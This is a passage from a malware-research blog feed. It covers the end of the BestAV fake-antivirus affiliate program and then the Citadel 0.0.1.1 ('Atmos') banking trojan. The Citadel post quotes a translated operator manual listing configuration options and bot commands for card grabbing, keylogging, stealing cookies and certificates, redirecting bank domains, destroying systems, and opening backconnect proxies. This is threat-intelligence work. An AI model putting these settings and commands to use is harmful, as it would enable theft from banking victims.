&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fJMQSUHlfLv9xhnqJzdOHGwITXeXrcVmgnR-GVM97zzxwwQWVVSNJYJ7jI4t7j-Hj2BiMj_KqhkfvAXGNbD9hv-X6D25CuHfRH8vuLu7IDQLfuqsREoEz1OexbXVig0BbOmL6Q5j6tk/s1600/nG3Yss0PZVlSRuDJ9RoC.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fJMQSUHlfLv9xhnqJzdOHGwITXeXrcVmgnR-GVM97zzxwwQWVVSNJYJ7jI4t7j-Hj2BiMj_KqhkfvAXGNbD9hv-X6D25CuHfRH8vuLu7IDQLfuqsREoEz1OexbXVig0BbOmL6Q5j6tk/s400/nG3Yss0PZVlSRuDJ9RoC.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSD6ERQxWrKGFdQgS50jnIWWbwnZdNA6JWmD9KyyxoXcCqPC_F5ExBW7x__aJMbg4eCSXGAKfINH6gc2dgx7mb-yD5rAAP4u-jC0y-cu9YGLMnJ3VXgLnksSt5L_K9WqxvwsSIShO6u6s/s1600/5hb3k4deZM5BvMM1PY9H6Y6pPUoDu3YEdecx6lYciVa.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSD6ERQxWrKGFdQgS50jnIWWbwnZdNA6JWmD9KyyxoXcCqPC_F5ExBW7x__aJMbg4eCSXGAKfINH6gc2dgx7mb-yD5rAAP4u-jC0y-cu9YGLMnJ3VXgLnksSt5L_K9WqxvwsSIShO6u6s/s400/5hb3k4deZM5BvMM1PY9H6Y6pPUoDu3YEdecx6lYciVa.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpk2-IMpUFTxaaC3ZAHcFboKmJ4ng4K3NBGI56fznQMwAwa2CO9my4WoiG0avomvpDdFLX7i13esh50ZCsmoYR_5ALfqROrDJyiglY0ujlEUcyT9yQG3EhZ-8BJCl5hMSA6RtayiuIOMQ/s1600/7RF4cyMueistmhehGBJV68EiXcy.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpk2-IMpUFTxaaC3ZAHcFboKmJ4ng4K3NBGI56fznQMwAwa2CO9my4WoiG0avomvpDdFLX7i13esh50ZCsmoYR_5ALfqROrDJyiglY0ujlEUcyT9yQG3EhZ-8BJCl5hMSA6RtayiuIOMQ/s400/7RF4cyMueistmhehGBJV68EiXcy.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJjBbw0SJN1lJnW-VRbcu-cHMdv1VFZtbnOGHCVI-GHhVhh96gt5oujnCPVM5h4axicqonauohIDvRP0Qj4BwqrsKhiuwaVl8AUFTiPROaFkq6dNUShdjYT8mVwtv-6nh7DeduQx7iF4U/s1600/FEK8RF0a8i7OIY89BON6IPBJUtJLx25nMxmgvAsCg.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJjBbw0SJN1lJnW-VRbcu-cHMdv1VFZtbnOGHCVI-GHhVhh96gt5oujnCPVM5h4axicqonauohIDvRP0Qj4BwqrsKhiuwaVl8AUFTiPROaFkq6dNUShdjYT8mVwtv-6nh7DeduQx7iF4U/s400/FEK8RF0a8i7OIY89BON6IPBJUtJLx25nMxmgvAsCg.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8QS7YSWdghVEZxjQwT2BzVi-sLb0kVxGGTfZiCAGGvVRBE9zJYtqZ9Pq7ZBFGqz6iKl8JkKphX1o6_nL1bDdTJe4xi8ibB2wFRSDzgE2lVrmIokaWUFki8ebdXym4jKI2FV1DOvIt6lg/s1600/PsPe4aAXGhp9coIKLMpIRVf.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8QS7YSWdghVEZxjQwT2BzVi-sLb0kVxGGTfZiCAGGvVRBE9zJYtqZ9Pq7ZBFGqz6iKl8JkKphX1o6_nL1bDdTJe4xi8ibB2wFRSDzgE2lVrmIokaWUFki8ebdXym4jKI2FV1DOvIt6lg/s400/PsPe4aAXGhp9coIKLMpIRVf.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
EK test:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyJZABqFWbDsgTMqliqB6CsgehCuhPbL86aac7UDqDDyIN3Bxm3Vjn6OpxY-2M5vQvGAZcBRAfKueVm4_O9VdbQR3yqimFRXsC5bwpYRn_ZAj5R0Mhp8czVRPsNMcJOB99-jP-Z6QYK4o/s1600/u7nPKFcV19FC2ZKPjEk8cg6f.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyJZABqFWbDsgTMqliqB6CsgehCuhPbL86aac7UDqDDyIN3Bxm3Vjn6OpxY-2M5vQvGAZcBRAfKueVm4_O9VdbQR3yqimFRXsC5bwpYRn_ZAj5R0Mhp8czVRPsNMcJOB99-jP-Z6QYK4o/s400/u7nPKFcV19FC2ZKPjEk8cg6f.png&quot; width=&quot;370&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Exploit Kit in action:&lt;br /&gt;&lt;a href=&quot;https://odysee.com/@XyliboxFranceVXCVE:3/sibhost-exploit-kit:e&quot;&gt;https://odysee.com/@XyliboxFranceVXCVE:3/sibhost-exploit-kit:e&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;BestAV was doing nothing since the end of 2013 and got back to work in end of jully 2014:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eyw1hnW8PupOn133kAnJqlrLbKt2J62Bb7XBREnTmkc-VXG3TPh4YaLp_7Woac69pmZR-GbsuabKpIKteafLo6EJDRd-a-DVla4Xs2TH1qINrEPCWYFRblU0WclSVfot7VO1Q0XImd0/s1600/2014-07-30_13-10-16.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;340&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eyw1hnW8PupOn133kAnJqlrLbKt2J62Bb7XBREnTmkc-VXG3TPh4YaLp_7Woac69pmZR-GbsuabKpIKteafLo6EJDRd-a-DVla4Xs2TH1qINrEPCWYFRblU0WclSVfot7VO1Q0XImd0/s1600/2014-07-30_13-10-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
19:42 29.07.2014 Перезагрузка. Reload. 3 2 1, Go go go!&lt;br /&gt;
Colleagues, we’ve restarted our services and looking forward to work!&lt;br /&gt;
---&lt;br /&gt;
15:53 27.03.2014 инсталлы починили&lt;br /&gt;
Installs are fixed now. Everything is fixed.&lt;br /&gt;
---&lt;br /&gt;
10:02 27.03.2014 Installs Update 2.&lt;br /&gt;
Setting up new callback server. Promised to be ready by tonight. Once more – payforms and sales are going through, there is no problem there&lt;br /&gt;
---&lt;br /&gt;
05:33 27.03.2014 Инсталлы&lt;br /&gt;
Callback proxy is broken. Fixing.&lt;br /&gt;
Payforms are working, sales are going through.&lt;br /&gt;
No reason to be worried.&lt;br /&gt;
---&lt;br /&gt;
21:02 04.03.2014 Payments.&lt;br /&gt;
Hello everyone, about the payments.&lt;br /&gt;
The situation is the next.. to unfreeze merchants I need 30-40 AV sales a day..&lt;br /&gt;
not so much, right? But due to some adverts stopped working after the New Year and some others experienced some problems and also stopped working there is almost no sales happening.&lt;br /&gt;
Huge regards to all the webmasters who support me in this difficult time!&lt;br /&gt;
I’m trying to bring the sales to the required level (buying traffic, etc.).&lt;br /&gt;
If my calculations are correct and no other surprises I’ll be at the required level next week and start pushing payments through, but would like to give you a warning in advance that the first ones to receive the payments will be the webmasters who have most of the sales – thanks to them we’re still operating.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;&lt;p&gt;The last RAW sample we saw before the final shutdown of the program: &lt;a href=&quot;https://www.virustotal.com/en/file/988c4604de2aec510c2d3242895b24c988bb115069c3834d47552fe7c2b86370/analysis/&quot;&gt;https://www.virustotal.com/en/file/988c4604de2aec510c2d3242895b24c988bb115069c3834d47552fe7c2b86370/analysis/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Voilà, so long, and thanks for all the fish !&lt;/p&gt;&lt;p&gt;This blog will be kept online (but inactive) for the numerous records about the malware scene of 2010-2016 era.&lt;br /&gt;Thank you everyone and see you in night city.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;--&lt;br /&gt;Xyl&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;</description><link>https://www.xylibox.com/2020/01/bestav-fake-antispyware-affiliate.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiomKib2IuaL8qYK0uqDNK2G3N8xDn_lCnFzr0dLtudYJdaLUd-hvXW1cnNajoACIXs-Pj8ibFOS3lBIisyBGYgCMCIXmkpI7s_TOVvD8PlJFGAFpbrMVOMw-njdYYEHqE2ni9TkZbv3I/s72-w400-h348-c/03-08-2013+18-07-02.png" height="72" width="72"/><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4932280966856220402</guid><pubDate>Fri, 19 Feb 2016 13:26:00 +0000</pubDate><atom:updated>2016-08-14T15:59:02.073+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Atmos</category><category domain="http://www.blogger.com/atom/ns#">Canada</category><category domain="http://www.blogger.com/atom/ns#">Citadel</category><category domain="http://www.blogger.com/atom/ns#">Citadel 0.0.1.1</category><category domain="http://www.blogger.com/atom/ns#">Citadel 101</category><category domain="http://www.blogger.com/atom/ns#">Holy shit a new post!</category><category domain="http://www.blogger.com/atom/ns#">Iframer</category><category domain="http://www.blogger.com/atom/ns#">Neuromodel</category><category domain="http://www.blogger.com/atom/ns#">Spam</category><category domain="http://www.blogger.com/atom/ns#">TokenSpy</category><category domain="http://www.blogger.com/atom/ns#">USA</category><category domain="http://www.blogger.com/atom/ns#">Webinject</category><category domain="http://www.blogger.com/atom/ns#">ZeuS</category><category domain="http://www.blogger.com/atom/ns#">Атмосу</category><category domain="http://www.blogger.com/atom/ns#">зевс</category><category domain="http://www.blogger.com/atom/ns#">зевсаподобного</category><title>Citadel 0.0.1.1 (Atmos)</title><description>&lt;br /&gt;
Guys of JPCERT, 有難う御座います！&lt;br /&gt;
Released an update to their &lt;a href=&quot;http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html&quot;&gt;Citadel decrypter&lt;/a&gt; to make it compatible with 0.0.1.1 sample.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6j4DT0jaXWIumHfBh0MMaHaTvkoV1OvFAAsBF7zmsoycRMH5gKQJoVKPUFziBfDWSKjNhtyMGEKEmMl_xt3exbWl_ehK7JXesMKoxGWwR-BZln34gpHpiFXHwQJuz8afdgxorYmFdMQ/s1600/2016-02-18_17-29-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;262&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6j4DT0jaXWIumHfBh0MMaHaTvkoV1OvFAAsBF7zmsoycRMH5gKQJoVKPUFziBfDWSKjNhtyMGEKEmMl_xt3exbWl_ehK7JXesMKoxGWwR-BZln34gpHpiFXHwQJuz8afdgxorYmFdMQ/s400/2016-02-18_17-29-30.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Citadel 0.0.1.1 don&#39;t have a lot of documentation, so time as come to talk about it.&lt;br /&gt;
Personally i know this malware under the name &#39;Atmos&#39; (be ready for name war in 3,2,1...)&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
The first sample i was aware is the one spotted by tilldenis &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1465&amp;amp;start=170#p26519&quot;&gt;here&lt;/a&gt; in jully 2015.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1BcTDIPNImn2eT3IX2yBDdFjRnWztRLasCBmv5dTDf_Ro_zJlE6KVMpwdKzqi3Iag-ytlwXwoVN-1E3yKfoCus2mZCsj-5cooICh_ORLQ8OPK4y46Nop9EqF3WdWbem5d_itJROuojA/s1600/2015-11-03_23-40-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;238&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC1BcTDIPNImn2eT3IX2yBDdFjRnWztRLasCBmv5dTDf_Ro_zJlE6KVMpwdKzqi3Iag-ytlwXwoVN-1E3yKfoCus2mZCsj-5cooICh_ORLQ8OPK4y46Nop9EqF3WdWbem5d_itJROuojA/s400/2015-11-03_23-40-28.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I re-observed this campaign in november 2015 with the same &#39;usca&#39;.&lt;br /&gt;
You can find a technical description of the product here: &lt;a href=&quot;http://pastebin.com/raw/cAqbrqAS&quot;&gt;http://pastebin.com/raw/cAqbrqAS&lt;/a&gt;&lt;a href=&quot;http://pastebin.com/raw.php?i=zuWeUtcu&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Here is a small part translated to English related to configuration and commands:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
3. Configuration&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;url_config1-10&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [up to 10 links to configuration files; 1 main for your web admin panel and 9 spare ones. To save the resources, use InterGate button in the builder to place config files on different links without setting up admin panel. Spare configs will be requested if the main one is not available during first EXE launch. Don&#39;t forget to put EXE and config files in &#39;files/&#39; folder]&lt;br /&gt;
&lt;u&gt;&lt;b&gt;&lt;span style=&quot;color: black;&quot;&gt;timer_config 4 9&lt;/span&gt;&lt;/b&gt;&lt;/u&gt; [Config file refresh timer in minutes | Retry interval]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;u&gt;timer_logs 3 6&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; [Logs upload timer in minutes | Retry in _ minutes]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;timer_stats 4 8&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [New command receiving and statistics upload timer in minutes | Retry in _ minutes]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;timer_modules 4 9&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [Additional configuration files receiving timer | Retry in _ minutes. Recommending to use the same setting as in timer_config]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;timer_autoupdate 8&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [EXE file renewal timer in hours]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;insidevm_enable 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Enable execution in virtual machine: 1 - yes | 0 - no]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;disable_antivirus 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [1 - Disable built-in &#39;AntiVirus&#39; that allows to delete previous version of Zeus/Citadel/Citra after EXE lauch |&amp;nbsp; 0 - leave enabled(recommended)]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;disable_httpgrabber 0/1&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;enable_luhn10_get 0/1&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [Enable CC grabber in GET-requests http/https]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;remove_certs 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Enable certificate deletion in IE storage]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;report_software 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;disable_tcpserver 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;enable_luhn10_post 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Enable CC grabber in POST-requests http/https]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;disable_cookies 0/1&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [1- Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the same]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;file_webinjects&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; &quot;injects.txt&quot; [File containing injects. Installed right after successful config files installation. Renewal timer is set in timer_config]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;url_webinjects&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; &quot;localhost/file.php&quot; [Path to &#39;file.php&#39; file. Feature of &#39;Web-Injects&#39; section for remote instant inject loading]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;AdvancedConfigs&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Links to backup configuration files. Works if !bot is already installed on the system! and first url_config is no longer accessible]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;WebFilters&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Set of different filters for URLs: video(# character), screenshot(single @ character - screenshot sequence after a click in the active zone. double @ character &#39;@@&#39; - Full size screenshot), ignore (! character), POST requests logging (P character), GET request logging (G character)]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry HttpVipUrls&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [URL blacklist. By default the follwing masks are NOT written to the logs &quot;facebook*&quot; &quot;*twitter*&quot;,&amp;nbsp; &quot;*google*&quot;. Adding individual lines with these masks will enable logging for them again]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;entry &quot;DnsFilters&quot;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now when going to bankofamerica.com - wellsfargo.com will be displayed. Not recommending blocking AV sites to avoid triggering pro-active defenses]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;CmdList&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [List of system commands after launch and uploading them to the server]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;Keylogger&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [List of process names for KeyLogger. Time parameter defines the time to work in hours after the process initialization]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;Video&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Video recording settings | x_scale/y_scale - video resolution | fps - frame per second, 1 to 5 |&amp;nbsp; kbs - frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture quality]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;Videologger&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; - [processes &quot;&quot; - list of processes to trigger video recording. Possible to use masks, for example calc.exe or *calc*]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;MoneyParser&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Balance grabber settings | include &quot;account,bank,balance&quot; - enable balance parsing if https:// page contains one of the following key words. | exclude &quot;casino,poker,game&quot; - do NOT perform parsing if one of the following words is found]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;FileSearch&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [File search by given mask. The report will be stored in &#39;File Hunter&#39; folder. Keywords can be a list of files or patterns ** to for on the disk. For example, multibit.exe will search for exact match on filename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude filenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program Files, etc | minimum_year - file creation/change date offset. The search task is always on. Remove all the parameters from this section to disable it.]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;NetScan&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [hostname &quot;host-to-scan.com&quot; - list of local/remote IP addresses to scan. scantype &quot;0&quot; - sets the IP address range, for example, scantype &quot;0&quot; scans a single IP in the &#39;hostname&#39;, scantype &quot;1&quot; creates a full scan of class C network 10.10.10.0-255, scantype &quot;2&quot; creates a full scan of class B network 10.10.0-255.0-255]&lt;br /&gt;
Example 1 {hostname &quot;10.10.0-255.0-255&quot; addrtype &quot;ipv4&quot; porttype &quot;tcp&quot; ports &quot;1-5000&quot; scantype &quot;2&quot;}&lt;br /&gt;
Example 2 {hostname &quot;10.10.1.0-255&quot; addrtype &quot;ipv4&quot; porttype &quot;tcp&quot; ports &quot;1-5000&quot; scantype &quot;1&quot;}]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;entry &quot;WebMagic&quot;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Local WebProxySrv, web server with its own storage. Allows to read and write bot parameters directly, for example, when using injects. This saves time and resources since it doesn&#39;t generate additional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also allows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect connection. Full settings description is located in F.A.Q section]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. Commands&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_execute &amp;lt;url&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [execute given file]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_execute &amp;lt;url&amp;gt; -f&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [execute given file, manual bot update that overwrites the current version]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;user_cookies_get&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [Get IE cookies]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_cookies_remove&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Remove IE cookies]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_certs_get&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Get .p12 certificates. Password: pass]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_certs_remove&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Remove certificates]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_homepage_set &amp;lt;url&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Set browser home page]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_flashplayer_get&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Get user&#39;s .sol files]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_flashplayer_remove&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Remove user&#39;s .sol files]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;url_open &amp;lt;url&amp;gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [open given URL in a browser]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;dns_filter_add &amp;lt;hostname&amp;gt; &amp;lt;ip&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;dns_filter_remove &amp;lt;url&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Remove domain name from redirect(blocking)]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_destroy&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Corrupt system vital files and reboot the system. Requires elevated privileges]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;user_logoff&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Logoff currently logged in user]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;os_reboot&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Reboot the host]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;os_shutdown&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Shutdown the host]&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: black;&quot;&gt;bot_uninstall&lt;/span&gt;&lt;/u&gt;&lt;/b&gt; [Remove bot file and uninstall it]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;bot_update &amp;lt;url&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Update bot configuration file. Requires to use the same the crypt. The path is set in url_config]&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;b&gt;bot_bc_add socks &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt; [Connect Bot &amp;gt; Backconnect Server &amp;gt; Socks5 | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for Proxifier/Browser...]&lt;br /&gt;
